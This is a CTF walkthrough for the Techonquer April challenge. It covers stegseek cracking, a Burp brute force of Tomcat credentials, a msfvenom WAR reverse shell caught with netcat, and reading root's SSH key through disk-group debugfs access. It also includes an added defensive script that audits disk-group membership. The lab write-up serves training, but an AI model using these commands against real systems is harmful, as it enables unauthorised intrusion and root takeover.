Techonquer Online CTF Challenge – April Edition

4/4/2025

CTF Walkthrough

Step 1: Malayalam Post

The first task involves analyzing a Malayalam post.

Step 2: Autopsy & URL Encoded Flag

Autopsy is a forensic tool used to recover deleted files.

Steps:

  • Open Autopsy → Load the disk image → Analyze deleted files.

  • Locate a file containing a URL-encoded flag.

  • Decode the flag using:

  • echo "encoded_string" | urldecode

  • The output reveals the flag.

Step 3: Barcode to Steganography

1. Scan the Barcode

  • Use an online barcode scanner or a command-line tool:

  • zbarimg barcode.png

  • The barcode contains a Pastebin URL.

2. Extract the Hidden Image

  • Open the Pastebin link and find hex values.

  • Replace the hex of "ChatGPT Share" with the Pastebin hex.

3. Use Stegseek to Crack the Image

  • The modified image contains hidden data.

  • Extract it using:

  • stegseek image.jpg /usr/share/wordlists/rockyou.txt

  • A password-protected file appears.

4. Retrieve Password & Decode Brainfuck

  • Password extracted: 123456789.

  • Open the .out file inside the extracted data.

  • The file contains Brainfuck code.

  • Decode using:

  • echo "brainfuck_code_here" | bf

  • The output reveals the flag.

Step 4: Network Scanning & Tomcat Exploitation

Step 4.1: Scan the Network

  • Scan the target machine for open ports:

  • nmap -p- <target_ip>

  • Discovered Ports:

  • Port 8080 → Apache Tomcat.

  • Port 80 → A file user.py with hints about a username.

Step 4.2: Brute Force Tomcat Credentials

  • Extract the username from user.py.

  • Use BurpSuite Intruder to brute-force the password:

  • Load Tomcat’s 1000 worst passwords.

  • Attack type: Cluster Bomb.

  • Found credentials: Username: tomcat, Password: tomcat.

Step 4.3: Deploying a WAR Shell

  • 1. Log in to Tomcat Manager using the credentials.

  • 2. Generate a WAR reverse shell:

  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f war > shell.war

  • 3. Upload the shell.war file in Tomcat Manager.

  • 4. Start a Netcat Listener:

  • nc -lvnp <your_port>

  • 5. Trigger the shell:

  • http://<target_ip>:8080/shell/

  • 6. Reverse shell access obtained!

Step 5: Privilege Escalation

Step 5.1: Find User Credentials

  • Navigate to /opt/ and find a hidden file .user.

  • Open it:

  • cat /opt/.user

  • It contains APT user credentials.

Step 5.2: SSH into APT User

  • Switch to the apt user:

  • su apt

  • Check user groups:

  • id

  • The user belongs to the disk group, meaning they have access to raw disk data.

Step 5.3: Reading Root SSH Key via Debugfs

1. List available disks:

  • fdisk -l

  • Identified disk: /dev/sda1.

2. Use debugfs to read the root SSH key:

  • debugfs /dev/sda1

  • Inside debugfs:

  • mkdir test

  • cat /root/.ssh/id_rsa

3. Copy the id_rsa private key.
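
The escalation in Steps 5.2 and 5.3 depends on an ordinary account holding the disk group, which gives it access to raw disk data. As an added example (not part of the original walkthrough), the shell functions below list every account that holds that group, so the condition can be found and removed during hardening; the function names are hypothetical and the sample group and passwd entries are constructed.

```shell
#!/bin/sh
# Added example: list every account that holds the "disk" group, either as a
# supplementary member (group file) or through its primary GID (passwd file).

# disk_group_accounts GROUP_FILE PASSWD_FILE -> sorted account names, one per line
disk_group_accounts() {
    awk -F: '
        FNR == NR {                      # first file: group database
            if ($1 == "disk") {
                gid = $3
                n = split($4, members, ",")
                for (i = 1; i <= n; i++)
                    if (members[i] != "") seen[members[i]] = 1
            }
            next
        }
        gid != "" && $4 == gid { seen[$1] = 1 }   # second file: primary GID match
        END { for (u in seen) print u }
    ' "$1" "$2" | sort
}

# audit_disk_group GROUP_FILE PASSWD_FILE -> prints findings, returns 1 if any
audit_disk_group() {
    accounts=$(disk_group_accounts "$1" "$2")
    [ -z "$accounts" ] && return 0
    for account in $accounts; do
        echo "FINDING: '$account' is in group disk (raw block device access)"
    done
    return 1
}

# Constructed sample databases (not taken from the challenge machine).
sample_dir=$(mktemp -d)
cat > "$sample_dir/group" <<'EOF'
root:x:0:
disk:x:6:apt
tomcat:x:998:
EOF
cat > "$sample_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
apt:x:1001:1001::/home/apt:/bin/bash
backup:x:34:6:backup:/var/backups:/usr/sbin/nologin
tomcat:x:998:998::/opt/tomcat:/bin/false
EOF

audit_disk_group "$sample_dir/group" "$sample_dir/passwd" || echo "audit: disk group is not empty"
rm -rf "$sample_dir"
```

On a live host, pass /etc/group and /etc/passwd as the two arguments; accounts defined in a directory service rather than those files are not covered.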

Step 6: Gaining Root Access

Step 6.1: Using the SSH Private Key

  • Save the key on your attacker machine:

  • echo "PRIVATE_KEY_HERE" > id_rsa

  • chmod 600 id_rsa

  • Use SSH to log in as root:

  • ssh -i id_rsa root@<target_ip>

Step 6.2: Capture the Root Flag

  • Navigate to the root directory:

  • cd /root

  • Read the final flag:

  • cat flag.txt